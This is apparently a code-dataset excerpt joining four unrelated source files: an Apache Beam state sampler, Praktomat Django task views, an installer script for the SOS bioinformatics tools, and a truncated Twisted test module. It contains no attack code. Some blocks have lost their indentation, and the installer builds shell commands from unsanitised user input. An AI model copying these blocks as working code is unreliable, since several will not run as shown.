# See the License for the specific language governing permissions and
# limitations under the License.
#
# This module is experimental. No backwards-compatibility guarantees.
# pytype: skip-file
import contextlib
import threading
from typing import TYPE_CHECKING
from typing import Dict
from typing import NamedTuple
from typing import Optional
from typing import Union
from apache_beam.runners import common
from apache_beam.utils.counters import Counter
from apache_beam.utils.counters import CounterFactory
from apache_beam.utils.counters import CounterName
try:
from apache_beam.runners.worker import statesampler_fast as statesampler_impl # type: ignore
FAST_SAMPLER = True
except ImportError:
from apache_beam.runners.worker import statesampler_slow as statesampler_impl
FAST_SAMPLER = False
if TYPE_CHECKING:
from apache_beam.metrics.execution import MetricsContainer
_STATE_SAMPLERS = threading.local()
def set_current_tracker(tracker):
  """Installs ``tracker`` as the current thread's StateSampler (may be None)."""
  _STATE_SAMPLERS.tracker = tracker
def get_current_tracker():
  """Returns the StateSampler registered for this thread, or None if unset."""
  return getattr(_STATE_SAMPLERS, 'tracker', None)
_INSTRUCTION_IDS = threading.local()
def get_current_instruction_id():
  """Returns the instruction id active on this thread, or None if unset."""
  return getattr(_INSTRUCTION_IDS, 'instruction_id', None)
@contextlib.contextmanager
def instruction_id(id):
  """Scopes ``id`` as this thread's instruction id for the ``with`` body.

  On exit the previously active id is restored, so nested or sequential
  scopes compose correctly instead of unconditionally resetting to None.

  Args:
    id: opaque instruction identifier, exposed via get_current_instruction_id.
  """
  previous = getattr(_INSTRUCTION_IDS, 'instruction_id', None)
  try:
    _INSTRUCTION_IDS.instruction_id = id
    yield
  finally:
    _INSTRUCTION_IDS.instruction_id = previous
def for_test():
  """Creates, installs, and returns a fresh StateSampler for use in tests."""
  set_current_tracker(StateSampler('test', CounterFactory()))
  return get_current_tracker()
# Snapshot of a StateSampler's progress:
#   state_name: counter name identifying the currently executing state.
#   transition_count: number of state transitions observed so far.
#   time_since_transition: time elapsed since the last state transition.
#   tracked_thread: the thread whose execution is being sampled, if any.
StateSamplerInfo = NamedTuple(
    'StateSamplerInfo',
    [('state_name', CounterName), ('transition_count', int),
     ('time_since_transition', int),
     ('tracked_thread', Optional[threading.Thread])])

# Default period for sampling current state of pipeline execution.
DEFAULT_SAMPLING_PERIOD_MS = 200
class StateSampler(statesampler_impl.StateSampler):
  """Tracks and samples the execution state of a single worker thread.

  The actual sampling machinery lives in the platform-specific base class
  (the Cython-accelerated ``statesampler_fast`` when available, otherwise
  the pure-Python ``statesampler_slow``).  This wrapper adds per-(step,
  state) msec counters and thread registration via set_current_tracker().
  """

  def __init__(self,
               prefix,  # type: str
               counter_factory,
               sampling_period_ms=DEFAULT_SAMPLING_PERIOD_MS):
    self._prefix = prefix
    self._counter_factory = counter_factory
    # Cache of ScopedStates keyed by counter name so each (step, state)
    # pair gets exactly one counter.
    self._states_by_name = {
    }  # type: Dict[CounterName, statesampler_impl.ScopedState]
    self.sampling_period_ms = sampling_period_ms
    self.tracked_thread = None  # type: Optional[threading.Thread]
    # NOTE(review): ``finished`` is never set True in this class; it appears
    # to be maintained by the base implementation -- confirm.
    self.finished = False
    self.started = False
    super(StateSampler, self).__init__(sampling_period_ms)

  @property
  def stage_name(self):
    # type: () -> str
    """Prefix identifying the stage this sampler belongs to."""
    return self._prefix

  def stop(self):
    # type: () -> None
    """Deregisters this sampler from the thread and stops sampling."""
    set_current_tracker(None)
    super(StateSampler, self).stop()

  def stop_if_still_running(self):
    # type: () -> None
    """Stops the sampler only if it was started and has not yet finished."""
    if self.started and not self.finished:
      self.stop()

  def start(self):
    # type: () -> None
    """Registers this sampler with the current thread and starts sampling."""
    self.tracked_thread = threading.current_thread()
    # Registered before super().start() so the tracker is already visible
    # once sampling begins.
    set_current_tracker(self)
    super(StateSampler, self).start()
    self.started = True

  def get_info(self):
    # type: () -> StateSamplerInfo
    """Returns StateSamplerInfo with transition statistics."""
    return StateSamplerInfo(
        self.current_state().name,
        self.state_transition_count,
        self.time_since_transition,
        self.tracked_thread)

  def scoped_state(self,
                   name_context,  # type: Union[str, common.NameContext]
                   state_name,  # type: str
                   io_target=None,
                   metrics_container=None  # type: Optional[MetricsContainer]
                  ):
    # type: (...) -> statesampler_impl.ScopedState

    """Returns a ScopedState object associated to a Step and a State.

    Args:
      name_context: common.NameContext. It is the step name information.
      state_name: str. It is the state name (e.g. process / start / finish).
      io_target:
      metrics_container: MetricsContainer. The step's metrics container.

    Returns:
      A ScopedState that keeps the execution context and is able to switch it
      for the execution thread.
    """
    if not isinstance(name_context, common.NameContext):
      name_context = common.NameContext(name_context)

    counter_name = CounterName(
        state_name + '-msecs',
        stage_name=self._prefix,
        step_name=name_context.metrics_name(),
        io_target=io_target)
    if counter_name in self._states_by_name:
      return self._states_by_name[counter_name]
    else:
      output_counter = self._counter_factory.get_counter(
          counter_name, Counter.SUM)
      self._states_by_name[counter_name] = super(StateSampler,
                                                 self)._scoped_state(
                                                     counter_name,
                                                     name_context,
                                                     output_counter,
                                                     metrics_container)
      return self._states_by_name[counter_name]

  def commit_counters(self):
    # type: () -> None

    """Updates output counters with latest state statistics."""
    for state in self._states_by_name.values():
      # state.nsecs is nanoseconds; counters are accumulated in msecs, so
      # only the delta since the last commit is added.
      state_msecs = int(1e-6 * state.nsecs)
      state.counter.update(state_msecs - state.counter.value())
| apache-2.0 |
lohner/Praktomat | src/tasks/views.py | 1 | 5082 | # -*- coding: utf-8 -*-
import tempfile
import zipfile
from django.contrib.auth.decorators import login_required
from django.contrib.admin.views.decorators import staff_member_required
from django.shortcuts import render, get_object_or_404
from django.http import Http404
from django.http import HttpResponseRedirect, HttpResponse
from datetime import datetime
from django import forms
from django.core import urlresolvers
from django.contrib import messages
import django.utils.timezone
from tasks.models import Task
from solutions.forms import ModelSolutionFormSet
from solutions.models import Solution, SolutionFile
from accounts.models import User
from accounts.views import access_denied
from attestation.models import Attestation
from attestation.views import user_task_attestation_map
from configuration import get_settings
@login_required
def taskList(request):
    """Lists running and expired tasks for the current user, together with
    their final solutions, attestations, tutors/trainers and (when
    published) the calculated final grade."""
    now = django.utils.timezone.now()
    # Running: already published; expired: submission deadline passed.
    tasks = Task.objects.filter(publication_date__lte = now).order_by('submission_date')
    expired_Tasks = Task.objects.filter(submission_date__lt = now).order_by('publication_date','submission_date')
    try:
        tutors = request.user.tutorial.tutors.all()
    except:
        # Users without a tutorial simply get no tutor list.
        tutors = None
    trainers = User.objects.filter(groups__name="Trainer")
    # we only have a single user here, so the rating_list only contains a single row;
    # this row belongs to that user
    (_,attestations,threshold,calculated_grade) = user_task_attestation_map([request.user], tasks)[0]
    # Pair every task with its attestation tuple (Python 2 two-iterable map).
    attestations = map(lambda a, b: (a,)+b, tasks, attestations)
    def tasksWithSolutions(tasks):
        # Attach the user's final solution (or None) to each task.
        return map(lambda t: (t, t.final_solution(request.user)), tasks)
    return render(request,
        'tasks/task_list.html',
        {
            'tasks':tasksWithSolutions(tasks),
            'expired_tasks': tasksWithSolutions(expired_Tasks),
            'attestations':attestations,
            'show_final_grade': get_settings().final_grades_published,
            'tutors':tutors,
            'trainers':trainers,
            'threshold':threshold,
            'calculated_grade':calculated_grade,
        })
@login_required
def taskDetail(request,task_id):
    """Shows one task and the requesting user's solutions for it.

    Tasks whose publication date lies in the future are hidden (404) from
    everyone except trainers.
    """
    task = get_object_or_404(Task,pk=task_id)
    # Use the same timezone-aware clock as taskList: comparing the (aware)
    # publication_date against naive datetime.now() raises TypeError when
    # USE_TZ is enabled and is wrong across timezones anyway.
    if task.publication_date >= django.utils.timezone.now() and not request.user.is_trainer:
        raise Http404
    # Reuse the task already fetched instead of re-querying it by pk.
    my_solutions = task.solution_set.filter(author = request.user)
    return render(request,
        'tasks/task_detail.html',
        {
            'task': task,
            'solutions': my_solutions,
        })
class ImportForm(forms.Form):
    # Single-field form for uploading a zipped task export in the admin.
    file = forms.FileField()
@staff_member_required
def import_tasks(request):
""" View in the admin """
if request.method == 'POST':
form = ImportForm(request.POST, request.FILES)
if form.is_valid():
try:
Task.import_Tasks(form.files['file'], request.user)
messages.success(request, "The import was successfull.")
return HttpResponseRedirect(urlresolvers.reverse('admin:tasks_task_changelist'))
except Exception, e:
from django.forms.utils import ErrorList
msg = "An Error occured. The import file was propably malformed.: %s" % str(e)
form._errors["file"] = ErrorList([msg])
else:
form = ImportForm()
return render(request, 'admin/tasks/task/import.html', {'form': form, 'title':"Import Task" })
@staff_member_required
def download_final_solutions(request, task_id):
    """ download all final solutions of a task from the admin interface

    Collects every file of every final solution of the task into an
    in-memory zip and returns it as an attachment.
    """
    zip_file = tempfile.SpooledTemporaryFile()
    # Named 'archive' so the builtin 'zip' is not shadowed.
    archive = zipfile.ZipFile(zip_file,'w')
    for solution_file in SolutionFile.objects.filter(solution__task=task_id):
        if solution_file.solution.final:
            archive.write(solution_file.file.path, solution_file.file.name)
    archive.close()
    zip_file.seek(0)
    response = HttpResponse(zip_file.read(), content_type="application/zip")
    response['Content-Disposition'] = 'attachment; filename=FinalSolutions.zip'
    return response
@staff_member_required
def model_solution(request, task_id):
    """ View in the admin: upload or replace the model solution of a task. """
    task = get_object_or_404(Task,pk=task_id)
    if request.method == "POST":
        solution = Solution(task = task, author=request.user)
        formset = ModelSolutionFormSet(request.POST, request.FILES, instance=solution)
        if formset.is_valid():
            try:
                solution.save();
                # no deleting the old solution:
                # delete will cascade on db level deleting checker results and checker
                # as this isn't easily prevented just keep the old solution around until the task is deleted
                formset.save()
                solution.check_solution(request.session)
                task.model_solution = solution;
                task.save()
            except:
                # Bare except on purpose: remove the half-saved solution's
                # files, then re-raise so nothing is committed.
                solution.delete() # delete files
                raise # dont commit db changes
    else:
        formset = ModelSolutionFormSet()
    context = {"formset": formset, "task": task, 'title': "Model Solution", 'is_popup': True, }
    return render(request, "admin/tasks/task/model_solution.html", context)
| gpl-2.0 |
SchulzLab/SOS | install_script.py | 1 | 11581 | #!/usr/bin/env python
import os
from optparse import OptionParser
import subprocess
import sys
#import commands
class install_script():
    """Interactive installer for the SOS pipeline's external tools.

    Downloads and builds Oases/Velvet, Salmon, ORNA, KREATION and SEECER
    into a user-chosen folder.  Each step shells out to git/wget/make and
    logs output under <path>/LogFiles/<tool>.txt for later inspection.
    """

    def __init__(self):
        # Paths of the tools downloaded/installed during this run.
        self.prog_installed = []

    def obtaining_tar(self, prog, path):
        """Downloads the sources of the requested tool(s) into ``path``.

        Args:
            prog: menu selection - 1 Oases, 2 Salmon, 3 ORNA, 4 KREATION,
                  5 SEECER, 6 everything, 8 Velvet.
            path: installation folder (must contain a LogFiles subfolder).
        """
        if (prog == 6):
            os.chdir(path)
            # Before obtaining the tar file of the corresponding tool, we always
            # check whether the folder already exists in the path. If it exists
            # we abort so an existing installation is never overwritten.
            chk = self.checkfolder("oases")
            if(chk == False):
                os.system("git clone --recursive http://github.com/dzerbino/oases.git")
            else:
                print ("The path already contains a folder named oases. Please rename the folder or remove it from the path")
                sys.exit()
            # SEECER: modified version used for the SOS manuscript (not the
            # version from the original SEECER publication).
            chk1 = self.checkfolder("SEECER.tar.gz")
            if(chk1 == False):
                # -O keeps the '?download=1' query string out of the local file
                # name so the tar call below can actually find the archive.
                os.system("wget -O SEECER.tar.gz https://zenodo.org/record/3686150/files/SEECER.tar.gz?download=1")
                os.system("tar -zxvf SEECER.tar.gz")
            else:
                print ("The path already contains a folder named SEECER.tar.gz. Please rename it or remove it from the path")
            # Salmon (binary release). To get a newer version change the links.
            chk2 = self.checkfolder("salmon-1.1.0_linux_x86_64.tar.gz")
            if(chk2 == False):
                print("-----salmon installation-------")
                os.system("wget https://github.com/COMBINE-lab/salmon/releases/download/v1.1.0/salmon-1.1.0_linux_x86_64.tar.gz >"+path+"/LogFiles/salmon.txt 2> "+path+"/LogFiles/salmonError.txt")
                os.system("tar -zxvf salmon-1.1.0_linux_x86_64.tar.gz >"+path+"/LogFiles/salmon.txt 2> "+path+"/LogFiles/salmonError.txt")
                self.prog_installed.append(path+"/salmon-1.1.0_linux_x86_64.tar.gz")
            else:
                print ("The path already contains a folder named salmon-1.1.0_linux_x86_64.tar.gz. Please rename it or remove it from the path")
                sys.exit()
            chk3 = self.checkfolder("ORNA")
            if(chk3 == False):
                os.system("git clone https://github.com/SchulzLab/ORNA")
                self.prog_installed.append(path+"/ORNA")
            else:
                print ("The path already contains a folder named ORNA. Please rename it or remove it from the path")
            chk4 = self.checkfolder("KREATION")
            if(chk4 == False):
                print("-----KREATION installation-------")
                os.system("git clone https://github.com/SchulzLab/KREATION >"+path+"/LogFiles/KREATION.txt 2> "+path+"/LogFiles/KreationError.txt")
                self.prog_installed.append(path+"/KREATION")
            else:
                print ("The path already contains a folder named KREATION. Please rename it or remove it from the path")
        if(prog==1):
            os.chdir(path)
            chk6 = self.checkfolder("oases")
            if(chk6 == False):
                os.system("git clone http://github.com/dzerbino/oases.git >"+path+"/LogFiles/Oases.txt 2> "+path+"/LogFiles/OasesError.txt")
            else:
                print ("The path already contains a folder named oases. please rename the folder or remove it from the path")
                sys.exit()
        if(prog==2):
            os.chdir(path)
            # NOTE(review): result unused; presumably a leftover platform
            # check -- confirm before removing.
            output = subprocess.check_output("uname")
            chk2 = self.checkfolder("salmon-1.1.0_linux_x86_64")
            if(chk2 == False):
                print("-----salmon installation-------")
                os.system("wget https://github.com/COMBINE-lab/salmon/releases/download/v1.1.0/salmon-1.1.0_linux_x86_64.tar.gz >"+path+"/LogFiles/salmon.txt 2> "+path+"/LogFiles/salmonError.txt")
                os.system("tar -zxvf salmon-1.1.0_linux_x86_64.tar.gz >"+path+"/LogFiles/salmon.txt 2> "+path+"/LogFiles/salmonError.txt")
                self.prog_installed.append(path+"/salmon-1.1.0_linux_x86_64.tar.gz")
                # Sanity check: the release unpacks into salmon-latest_linux_x86_64.
                chksalmon=self.checkfolder(path+"/salmon-latest_linux_x86_64/bin/salmon")
                if(chksalmon==False):
                    print("Salmon did not install correctly. Please try again")
                    sys.exit()
                else:
                    print("Salmon installed successfully")
            else:
                print ("The path already contains a folder named salmon-1.1.0_linux_x86_64.tar.gz. please rename it or remove it from the path")
                sys.exit()
        if (prog == 3):
            os.chdir(path)
            chk2 = self.checkfolder("ORNA")
            if(chk2 == False):
                os.system("git clone https://github.com/SchulzLab/ORNA >"+path+"/LogFiles/ORNA.txt 2> "+path+"/LogFiles/ORNAError.txt")
                self.prog_installed.append(path+"/ORNA")
            else:
                print ("The path already contains a folder named ORNA. Please rename it or remove it from the path")
        if (prog == 4):
            os.chdir(path)
            # 'which' exits with status 0 iff cd-hit-est is on $PATH.  (A
            # tuple-unpack of subprocess.check_output can never work here:
            # it returns bytes and raises when the command is not found.)
            status = subprocess.call("which cd-hit-est", shell=True,
                                     stdout=subprocess.DEVNULL,
                                     stderr=subprocess.DEVNULL)
            if(status != 0):
                uc = input("cd-hit is not found in the environment variables. Do you want to install (y/n) : ")
                if(uc == "y"):
                    os.system("git clone https://github.com/weizhongli/cdhit >"+path+"/LogFiles/cdhit.txt 2> "+path+"/LogFiles/cdhitError.txt")
                    self.install_cdhit(path)
                    os.chdir(path)
                else:
                    print ("Please remember that cd-hit-est is required for the running of KREATION and must be in the environment variable $PATH")
            chk2 = self.checkfolder("KREATION")
            if(chk2 == False):
                print("-----KREATION installation-------")
                os.system("git clone https://github.com/SchulzLab/KREATION >"+path+"/LogFiles/KREATION.txt 2> "+path+"/LogFiles/KreationError.txt")
                self.prog_installed.append(path+"/KREATION")
                chkkreation=self.checkfolder(path+"/KREATION/KREATION.py")
                if(chkkreation==False):
                    print("KREATION did not install correctly. Please try again")
                    sys.exit()
                else:
                    print("KREATION installed successfully")
            else:
                print ("The path already contains a folder named KREATION. Please rename it or remove it from the path")
        if (prog == 5):
            os.chdir(path)
            chk1 = self.checkfolder("SEECER.tar.gz")
            if(chk1 == False):
                print("-----SEECER installation-----")
                os.system("wget https://zenodo.org/record/3686150/files/SEECER.tar.gz > "+path+"/LogFiles/Seecer.txt 2> "+path+"/LogFiles/SeecerError.txt")
                os.system("tar -zxvf SEECER.tar.gz > "+path+"/LogFiles/Seecer.txt 2> "+path+"/LogFiles/SeecerError.txt")
                chkkreation=self.checkfolder(path+"/SEECER-0.1.3/SEECER/bin/run_seecer.sh")
                if(chkkreation==False):
                    print("SEECER did not install correctly. Please try again")
                    sys.exit()
                else:
                    print("SEECER installed successfully")
            else:
                print ("The path already contains a folder named SEECER.tar.gz. Please rename it or remove it from the path")
        if(prog==8):
            os.chdir(path)
            chk5 = self.checkfolder("velvet")
            if(chk5 == False):
                os.system("git clone http://github.com/dzerbino/velvet.git >"+path+"/LogFiles/Velvet.txt 2> "+path+"/LogFiles/VelvetError.txt")
            else:
                print ("The path already contains a folder named velvet. please rename the folder or remove it from the path")
                sys.exit()

    def install_oases(self, path, cs):
        """Builds Oases in <path>/oases with extra make settings ``cs``."""
        print("------Oases installation------")
        path2 = path + "/oases"
        os.chdir(path2)
        os.system("make "+cs+" > "+path+"/LogFiles/Oases.txt 2> "+path+"/LogFiles/OasesError.txt")
        self.prog_installed.append(path2)
        chk=self.checkfolder(path+"/oases/oases")
        if(chk==False):
            print("Oases did not install correctly. Please try again")
            sys.exit()
        else:
            print("Oases installed successfully")

    def install_orna(self, path):
        """Builds ORNA in <path>/ORNA via its install.sh script."""
        print("------ORNA installation------")
        path2 = path + "/ORNA"
        os.chdir(path2)
        os.system("bash install.sh > "+path+"/LogFiles/ORNA.txt 2> "+path+"/LogFiles/ORNAError.txt")
        self.prog_installed.append(path2)
        chk=self.checkfolder(path+"/ORNA/build/bin/ORNA")
        if(chk==False):
            print("ORNA did not install correctly. Please try again")
            sys.exit()
        else:
            print("ORNA installed successfully")

    def install_velvet(self, path, cs):
        """Builds Velvet in <path>/velvet with extra make settings ``cs``."""
        path1 = path + "/velvet"
        os.chdir(path1)
        print("------Velvet installation------")
        os.system("make "+cs+" > "+path+"/LogFiles/velvet.txt 2> "+path+"/LogFiles/VelvetError.txt")
        self.prog_installed.append(path1)
        chk=self.checkfolder(path+"/velvet/velvetg") and self.checkfolder(path+"/velvet/velveth")
        if(chk==False):
            print("velvet did not install correctly. Please try again")
            sys.exit()
        else:
            print("velvet installed successfully")

    def install_cdhit(self, path):
        """Builds cd-hit (providing cd-hit-est) in <path>/cdhit."""
        path1 = path + "/cdhit"
        os.chdir(path1)
        print("------cd-hit-est installation------")
        os.system("make > "+path+"/LogFiles/cdhit.txt 2> "+path+"/LogFiles/cdHitError.txt")

    def getoptions(self):
        """Parses command line options; returns an object with .foldername."""
        parser = OptionParser()
        parser.add_option("-f", "--folder", dest="foldername", help="destination folder")
        (options, args) = parser.parse_args()
        return options

    def checkfolder(self, program):
        """Returns True if ``program`` (file or folder) exists on disk."""
        var = os.path.exists(program)
        return var
########### MAIN PROGRAM ###########
# Interactive driver: asks which tools to install and delegates the
# download/build steps to install_script.
x = install_script()
y1 = x.getoptions()
if(y1.foldername != None):
    try:
        os.chdir(y1.foldername)
    except:
        uc = input("folder "+ y1.foldername + " does not exists. Do you want to create one (y/n) : ")
        if(uc == "y"):
            os.system("mkdir " +y1.foldername)
            os.chdir(y1.foldername)
        else:
            sys.exit()
pwd = os.getcwd()
os.system("mkdir LogFiles")
print ("Programs to install :")
print ("1. OASES")
print ("2. SALMON")
print ("3. ORNA")
print ("4. KREATION")
print ("5. SEECER")
print ("6. ALL")
print ("7. QUIT")
x1 = input("Enter the option number (if multiple options then separate it by comma): ")
y = x1.split(",")
# cs accumulates extra make settings (quoted, space separated); flg records
# whether Velvet must be built locally before Oases.
acs = ""
vd = ""
flg = 0
cs = ""
a13 = ""
if("7" in y):
    print("Thank you. It was nice working for you")
    sys.exit()
if "6" in y:
    # Obtaining and installing oases and velvet
    vc = input("Execution of Oases requires velvet. Do you want to install velvet (y/n) : ")
    if(vc == "y"):
        ch = input("Do you want to include additional compilation settings for velvet (refer to velvet manual for details) y/n : ")
        if(ch == "y"):
            print("Enter the additional compilation settings of velvet seperated by space (for instance - \'MAXKMERLENGTH=57\'):")
            a1 = input()
            a11 = a1.split()
            for a2 in a11:
                # Normalise each setting to a single-quoted KEY=VALUE token.
                a2 = a2.replace("'","")
                a2 = "\'" + a2 + "\'"
                a13 = a13 + " " + a2
            cs = cs + a13
            flg = 1
        cs = cs + "\'VELVET_DIR="+pwd+"/velvet\'"
    if(vc == "n"):
        vd = input("Enter the location of velvet : ")
        cs = cs + " \'VELVET_DIR=" + vd +"\'"
    x.obtaining_tar(1, pwd)
    if (flg == 1):
        x.obtaining_tar(8, pwd)
        x.install_velvet(pwd, cs)
    x.install_oases(pwd, cs)
    # Obtaining salmon
    x.obtaining_tar(2, pwd)
    # Obtaining ORNA
    x.obtaining_tar(3, pwd)
    x.install_orna(pwd)
    # Obtaining KREATION
    x.obtaining_tar(4, pwd)
    # Obtaining SEECER
    x.obtaining_tar(5, pwd)
else:
    for i in y:
        if(int(i) == 1):
            vc = input("Execution of Oases requires velvet. Do you want to install velvet (y/n) : ")
            if(vc == "y"):
                ch = input("Do you want to include additional compilation settings for velvet (refer to velvet manual for details) y/n : ")
                if(ch == "y"):
                    print("Enter the additional compilation settings of velvet seperated by space (for instance - \'MAXKMERLENGTH=57\'):")
                    a1 = input()
                    a11 = a1.split()
                    for a2 in a11:
                        a2 = a2.replace("'","")
                        a2 = "\'" + a2 + "\'"
                        a13 = a13 + " " + a2
                    cs = cs + a13
                    flg = 1
                cs = cs + " \'VELVET_DIR="+pwd+"/velvet\'"
            if(vc == "n"):
                vd = input("Enter the location of velvet : ")
                if("\\" not in vd):
                    cs = cs + " \'VELVET_DIR=" +pwd+"\\"+ vd +"\'"
                else:
                    cs = cs + " \'VELVET_DIR=" + vd +"\'"
            x.obtaining_tar(1,pwd)
            if(flg == 1):
                x.obtaining_tar(8,pwd)
                x.install_velvet(pwd, cs)
            x.install_oases(pwd, cs)
        elif(int(i)==3):
            x.obtaining_tar(3,pwd)
            x.install_orna(pwd)
        else:
            # Options 2, 4 and 5 are fully handled inside obtaining_tar.
            x.obtaining_tar(int(i), pwd)
| mit |
zhuwenping/python-for-android | python-modules/twisted/twisted/test/test_task.py | 56 | 20565 | # Copyright (c) 2001-2007 Twisted Matrix Laboratories.
# See LICENSE for details.
from twisted.python.compat import set
from twisted.trial import unittest
from twisted.internet import interfaces, task, reactor, defer, error
# Be compatible with any jerks who used our private stuff
Clock = task.Clock
from twisted.python import failure
class TestableLoopingCall(task.LoopingCall):
    """LoopingCall variant whose reactor clock is injected for testing."""

    def __init__(self, clock, *args, **kwargs):
        super(TestableLoopingCall, self).__init__(*args, **kwargs)
        self.clock = clock
class TestException(Exception):
    """Sentinel exception raised by the test callables in this module."""
    pass
class ClockTestCase(unittest.TestCase):
    """
    Test the non-wallclock based clock implementation.
    """
    def testSeconds(self):
        """
        Test that the L{seconds} method of the fake clock returns fake time.
        """
        c = task.Clock()
        self.assertEquals(c.seconds(), 0)

    def testCallLater(self):
        """
        Test that calls can be scheduled for later with the fake clock and
        hands back an L{IDelayedCall}.
        """
        c = task.Clock()
        call = c.callLater(1, lambda a, b: None, 1, b=2)
        self.failUnless(interfaces.IDelayedCall.providedBy(call))
        self.assertEquals(call.getTime(), 1)
        self.failUnless(call.active())

    def testCallLaterCancelled(self):
        """
        Test that calls can be cancelled.
        """
        c = task.Clock()
        call = c.callLater(1, lambda a, b: None, 1, b=2)
        call.cancel()
        self.failIf(call.active())

    def test_callLaterOrdering(self):
        """
        Test that the DelayedCall returned is not one previously
        created.
        """
        c = task.Clock()
        call1 = c.callLater(10, lambda a, b: None, 1, b=2)
        call2 = c.callLater(1, lambda a, b: None, 3, b=4)
        self.failIf(call1 is call2)

    def testAdvance(self):
        """
        Test that advancing the clock will fire some calls.
        """
        events = []
        c = task.Clock()
        call = c.callLater(2, lambda: events.append(None))
        c.advance(1)
        self.assertEquals(events, [])
        c.advance(1)
        self.assertEquals(events, [None])
        self.failIf(call.active())

    def testAdvanceCancel(self):
        """
        Test attemping to cancel the call in a callback.

        AlreadyCalled should be raised, not for example a ValueError from
        removing the call from Clock.calls. This requires call.called to be
        set before the callback is called.
        """
        c = task.Clock()
        def cb():
            self.assertRaises(error.AlreadyCalled, call.cancel)
        call = c.callLater(1, cb)
        c.advance(1)

    def testCallLaterDelayed(self):
        """
        Test that calls can be delayed.
        """
        events = []
        c = task.Clock()
        call = c.callLater(1, lambda a, b: events.append((a, b)), 1, b=2)
        call.delay(1)
        self.assertEquals(call.getTime(), 2)
        c.advance(1.5)
        self.assertEquals(events, [])
        c.advance(1.0)
        self.assertEquals(events, [(1, 2)])

    def testCallLaterResetLater(self):
        """
        Test that calls can have their time reset to a later time.
        """
        events = []
        c = task.Clock()
        call = c.callLater(2, lambda a, b: events.append((a, b)), 1, b=2)
        c.advance(1)
        call.reset(3)
        self.assertEquals(call.getTime(), 4)
        c.advance(2)
        self.assertEquals(events, [])
        c.advance(1)
        self.assertEquals(events, [(1, 2)])

    def testCallLaterResetSooner(self):
        """
        Test that calls can have their time reset to an earlier time.
        """
        events = []
        c = task.Clock()
        call = c.callLater(4, lambda a, b: events.append((a, b)), 1, b=2)
        call.reset(3)
        self.assertEquals(call.getTime(), 3)
        c.advance(3)
        self.assertEquals(events, [(1, 2)])

    def test_getDelayedCalls(self):
        """
        Test that we can get a list of all delayed calls
        """
        c = task.Clock()
        call = c.callLater(1, lambda x: None)
        call2 = c.callLater(2, lambda x: None)
        calls = c.getDelayedCalls()
        self.assertEquals(set([call, call2]), set(calls))

    def test_getDelayedCallsEmpty(self):
        """
        Test that we get an empty list from getDelayedCalls on a newly
        constructed Clock.
        """
        c = task.Clock()
        self.assertEquals(c.getDelayedCalls(), [])

    def test_providesIReactorTime(self):
        """
        A L{Clock} instance should provide L{IReactorTime}.
        """
        c = task.Clock()
        self.failUnless(interfaces.IReactorTime.providedBy(c),
                        "Clock does not provide IReactorTime")
class LoopTestCase(unittest.TestCase):
    """
    Tests for L{task.LoopingCall} based on a fake L{IReactorTime}
    implementation.
    """
    def test_defaultClock(self):
        """
        L{LoopingCall}'s default clock should be the reactor.
        """
        call = task.LoopingCall(lambda: None)
        self.assertEqual(call.clock, reactor)

    def test_callbackTimeSkips(self):
        """
        When more time than the defined interval passes during the execution
        of a callback, L{LoopingCall} should schedule the next call for the
        next interval which is still in the future.
        """
        times = []
        callDuration = None
        clock = task.Clock()
        def aCallback():
            times.append(clock.seconds())
            clock.advance(callDuration)
        call = task.LoopingCall(aCallback)
        call.clock = clock

        # Start a LoopingCall with a 0.5 second increment, and immediately call
        # the callable.
        callDuration = 2
        call.start(0.5)

        # Verify that the callable was called, and since it was immediate, with
        # no skips.
        self.assertEqual(times, [0])

        # The callback should have advanced the clock by the callDuration.
        self.assertEqual(clock.seconds(), callDuration)

        # An iteration should have occurred at 2, but since 2 is the present
        # and not the future, it is skipped.
        clock.advance(0)
        self.assertEqual(times, [0])

        # 2.5 is in the future, and is not skipped.
        callDuration = 1
        clock.advance(0.5)
        self.assertEqual(times, [0, 2.5])
        self.assertEqual(clock.seconds(), 3.5)

        # Another iteration should have occurred, but it is again the
        # present and not the future, so it is skipped as well.
        clock.advance(0)
        self.assertEqual(times, [0, 2.5])

        # 4 is in the future, and is not skipped.
        callDuration = 0
        clock.advance(0.5)
        self.assertEqual(times, [0, 2.5, 4])
        self.assertEqual(clock.seconds(), 4)

    def test_reactorTimeSkips(self):
        """
        When more time than the defined interval passes between when
        L{LoopingCall} schedules itself to run again and when it actually
        runs again, it should schedule the next call for the next interval
        which is still in the future.
        """
        times = []
        clock = task.Clock()
        def aCallback():
            times.append(clock.seconds())

        # Start a LoopingCall that tracks the time passed, with a 0.5 second
        # increment.
        call = task.LoopingCall(aCallback)
        call.clock = clock
        call.start(0.5)

        # Initially, no time should have passed!
        self.assertEqual(times, [0])

        # Advance the clock by 2 seconds (2 seconds should have passed)
        clock.advance(2)
        self.assertEqual(times, [0, 2])

        # Advance the clock by 1 second (3 total should have passed)
        clock.advance(1)
        self.assertEqual(times, [0, 2, 3])

        # Advance the clock by 0 seconds (this should have no effect!)
        clock.advance(0)
        self.assertEqual(times, [0, 2, 3])

    def test_reactorTimeCountSkips(self):
        """
        When L{LoopingCall} schedules itself to run again, if more than the
        specified interval has passed, it should schedule the next call for the
        next interval which is still in the future. If it was created
        using L{LoopingCall.withCount}, a positional argument will be
        inserted at the beginning of the argument list, indicating the number
        of calls that should have been made.
        """
        times = []
        clock = task.Clock()
        def aCallback(numCalls):
            times.append((clock.seconds(), numCalls))

        # Start a LoopingCall that tracks the time passed, and the number of
        # skips, with a 0.5 second increment.
        call = task.LoopingCall.withCount(aCallback)
        call.clock = clock
        INTERVAL = 0.5
        REALISTIC_DELAY = 0.01
        call.start(INTERVAL)

        # Initially, no seconds should have passed, and one calls should have
        # been made.
        self.assertEqual(times, [(0, 1)])

        # After the interval (plus a small delay, to account for the time that
        # the reactor takes to wake up and process the LoopingCall), we should
        # still have only made one call.
        clock.advance(INTERVAL + REALISTIC_DELAY)
        self.assertEqual(times, [(0, 1), (INTERVAL + REALISTIC_DELAY, 1)])

        # After advancing the clock by three intervals (plus a small delay to
        # account for the reactor), we should have skipped two calls; one less
        # than the number of intervals which have completely elapsed. Along
        # with the call we did actually make, the final number of calls is 3.
        clock.advance((3 * INTERVAL) + REALISTIC_DELAY)
        self.assertEqual(times,
                         [(0, 1), (INTERVAL + REALISTIC_DELAY, 1),
                          ((4 * INTERVAL) + (2 * REALISTIC_DELAY), 3)])

        # Advancing the clock by 0 seconds should not cause any changes!
        clock.advance(0)
        self.assertEqual(times,
                         [(0, 1), (INTERVAL + REALISTIC_DELAY, 1),
                          ((4 * INTERVAL) + (2 * REALISTIC_DELAY), 3)])

    def test_countLengthyIntervalCounts(self):
        """
        L{LoopingCall.withCount} counts only calls that were expected to be
